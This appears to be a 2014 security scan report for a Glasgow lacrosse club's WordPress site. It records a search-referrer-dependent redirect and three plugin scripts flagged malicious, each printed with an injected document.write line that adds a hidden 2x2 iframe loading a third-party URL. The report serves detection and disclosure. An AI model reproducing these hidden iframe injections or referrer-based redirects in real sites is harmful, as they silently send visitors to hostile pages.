Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.glasgowlacrosse.co.uk/ (request imitating a visitor arriving from a search engine; the same URL is listed as 200 OK / clean under "Scanned pages/files", so the redirect appears to depend on the Referer header) GET / HTTP/1.1 Host: www.glasgowlacrosse.co.uk Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Sep 2014 10:41:36 GMT Location: http://mikeritchie.net/showthread.php?sid=84074 Server: nginx Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 Ngpass_all: 1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.glasgowlacrosse.co.uk/ | 200 OK Content-Length: 12495 Content-Type: text/html | clean |
http://code.jquery.com/jquery-latest.min.js?ver=latest | 200 OK Content-Length: 95786 Content-Type: application/x-javascript | clean |
http://www.glasgowlacrosse.co.uk/wp-content/plugins/advanced-spoiler/js/jquery-spoiler.js?ver=2.02 | 200 OK Content-Length: 3179 Content-Type: application/javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The excerpt appears abridged; the flagged part is the final document.write call, which follows the plugin's own code and writes a 2x2 iframe that loads a third-party URL. The path and sid value of that URL match the redirect target reported under "Malicious/Suspicious Redirects", on a different host.
var Spoiler = { timer: 0, setOption: function(options) { var newOptions = Object.extend(options||{}, arguments[1]||{}); return newOptions; }, _start: function() { jQuery('a.spoiler-tgl').each(function(i){ var el = jQuery('#'+jQuery(this).attr('id').replace('_tgl', '')); var opt = jQuery(this).attr('rev').split('||'); this.onclick = function(){Spoiler.plugin(el, jQuery(this), opt); return false;}; if(el.css('display') != 'none') { plugin: function(el, tid, opt){ if (el.css('display') != 'none') { tid.html(opt[1]); } else { tid.html(opt[2]); } tid.toggleClass("collapsed"); Spoiler.toggle(el, opt[0], parseInt(opt[3])); } }; jQuery(document).ready(function() { Spoiler.start(); }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=84074 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074> | ||
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js?ver=3.9.2 | 200 OK Content-Length: 200719 Content-Type: text/javascript | clean |
http://www.glasgowlacrosse.co.uk/wp-content/plugins/thethe-tabs-and-accordions/style/js/thethe.toggle.js?ver=3.9.2 | 200 OK Content-Length: 2283 Content-Type: application/javascript | clean |
http://www.glasgowlacrosse.co.uk/wp-content/plugins/thethe-tabs-and-accordions/style/js/thethe.haccordion.js?ver=3.9.2 | 200 OK Content-Length: 5567 Content-Type: application/javascript | clean |
http://www.glasgowlacrosse.co.uk/wp-content/plugins/wordpress-tabs-slides/ts/tabs_slides.js?ver=2.0.1 | 200 OK Content-Length: 8311 Content-Type: application/javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The excerpt appears abridged; of the two document.write calls shown, the first writes the plugin's own style rule and the flagged one is the last, which writes a 2x2 iframe that loads a third-party URL.
document.write('<style type="text/css">.jwts_tabber{display:none;}<\/style>'); var pageURL = window.location.toString().slice(0, -1); var urlArray = new Array(); urlArray = pageURL.split('//')[1]; var pageId = urlArray.split('/')[urlArray.split('/').length-1]; var tabberOptions = { 'manualStartup':true, 'cookie':"jwts_tc_"+pageId, 'onLoad': function(argsObj) { var t = argsObj.tabber; var wtsslide = function(wrapper,speed){ jQuery(wrapper).slideToggle(speed); } wtsaccordion = function(group,wrapper,speed){ jQuery(group).hide(); jQuery(wrapper).slideToggle(speed).toggleClass("active"); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=84074 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074> | ||
http://www.glasgowlacrosse.co.uk/wp-content/plugins/wordpress-tabs-slides/ts/tabs_slides_opt_loader.js?ver=2.0.1 | 200 OK Content-Length: 2201 Content-Type: application/javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The excerpt appears abridged; the flagged part is the final document.write call, which follows the loader's own code and writes a 2x2 iframe that loads a third-party URL.
var DomLoaded = { onload: [], loaded: function() { if (arguments.callee.done) return; arguments.callee.done = true; for (i = 0;i < DomLoaded.onload.length;i++) { if(DomLoaded.onload[i] != undefined){ DomLoaded.onload[i](); } } }, load: function(fireThis) { this.onload.push(fireThis); if (document.addEventListener) document.addEventListener("DOMContentLoaded", DomLoaded.loaded, null); window.onload = func; } else { window.onload = function() { if (oldonload) { oldonload(); } func(); } } } }; DomLoaded.load(function() { tabberAutomatic(tabberOptions); }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=84074 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=84074> | ||
http://www.glasgowlacrosse.co.uk/wp-content/themes/twentyfourteen/js/functions.js?ver=20140319 | 200 OK Content-Length: 3393 Content-Type: application/javascript | clean |
http://www.glasgowlacrosse.co.uk/news/ | 200 OK Content-Length: 35348 Content-Type: text/html | clean |
http://www.glasgowlacrosse.co.uk/about/ | 200 OK Content-Length: 17041 Content-Type: text/html | clean |
http://www.glasgowlacrosse.co.uk/about/mens-lacrosse/ | 200 OK Content-Length: 21368 Content-Type: text/html | clean |
http://www.glasgowlacrosse.co.uk/about/womens-lacrosse/ | 200 OK Content-Length: 18613 Content-Type: text/html | clean |
http://www.glasgowlacrosse.co.uk/membership/ | 200 OK Content-Length: 13941 Content-Type: text/html | clean |
http://www.glasgowlacrosse.co.uk/calender/ | 200 OK Content-Length: 12728 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=glasgowlacrosse.co.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://glasgowlacrosse.co.uk/
Result: glasgowlacrosse.co.uk is not infected or malware details are not published yet.
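Result: glasgowlacrosse.co.uk is not infected or malware details are not published yet. These lookups report only whether the site is on each service's list at the time of the query; a "not listed" result does not contradict the malicious findings in the scan above.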